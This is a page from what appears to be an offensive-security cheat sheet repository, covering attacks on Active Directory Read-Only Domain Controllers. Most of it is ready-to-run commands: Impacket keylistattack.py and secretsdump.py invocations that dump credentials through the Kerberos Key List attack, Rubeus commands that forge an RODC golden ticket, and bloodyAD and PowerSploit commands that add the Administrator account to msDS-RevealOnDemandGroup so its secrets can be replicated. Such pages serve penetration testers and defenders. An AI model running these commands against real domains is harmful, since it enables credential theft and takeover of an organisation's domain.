InternalAllTheThings/docs/active-directory/ad-adds-rodc.md

3.4 KiB
Raw Permalink Blame History

Active Directory - Read Only Domain Controller

RODCs are an alternative for Domain Controllers in less secure physical locations

  • Contains a filtered copy of AD (LAPS and Bitlocker keys are excluded)
  • Any user or group specified in the managedBy attribute of an RODC has local admin access to the RODC server

RODC Golden Ticket

  • You can forge an RODC golden ticket and present it to a writable Domain Controller only for principals listed in the RODCs msDS-RevealOnDemandGroup attribute and not in the RODCs msDS-NeverRevealGroup attribute

RODC Key List Attack

Requirements:

Exploit:

  • using Impacket
    # keylistattack.py using SAMR user enumeration without filtering (-full flag)
    keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
    
    # keylistattack.py defining a target username (-t flag)
    keylistattack.py -kdc server.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST
    
    # secretsdump.py using the Kerberos Key List Attack option (-use-keylist)
    secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
    
  • Using Rubeus
    Rubeus.exe golden /rodcNumber:25078 /aes256:eacd894dd0d934e84de35860ce06a4fac591ca63c228ddc1c7a0ebbfa64c7545 /user:admin /id:1136 /domain:lab.local /sid:S-1-5-21-1437000690-1664695696-1586295871
    Rubeus.exe asktgs /enctype:aes256 /keyList /service:krbtgt/lab.local /dc:dc1.lab.local /ticket:doIFgzCC[...]wIBBxhYnM=
    

RODC Computer Object

When you have one the following permissions to the RODC computer object: GenericWrite, GenericAll, WriteDacl, Owns, WriteOwner, WriteProperty.

  • Add a domain admin account to the RODC's msDS-RevealOnDemandGroup attribute
    • Windows/Linux:
      # Get original msDS-RevealOnDemandGroup values 
      bloodyAD --host 10.10.10.10 -d domain.local -u username -p pass123 get object 'RODC$' --attr msDS-RevealOnDemandGroup
      distinguishedName: CN=RODC,CN=Computers,DC=domain,DC=local
      msDS-RevealOnDemandGroup: CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local
      # Add the previous value plus the admin account
      bloodyAD --host 10.10.10.10 -d example.lab -u username -p pass123 set object 'RODC$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local'
      
    • Windows only:
    PowerSploit> Set-DomainObject -Identity RODC$ -Set @{'msDS-RevealOnDemandGroup'=@('CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local', 'CN=Administrator,CN=Users,DC=domain,DC=local')}
    

References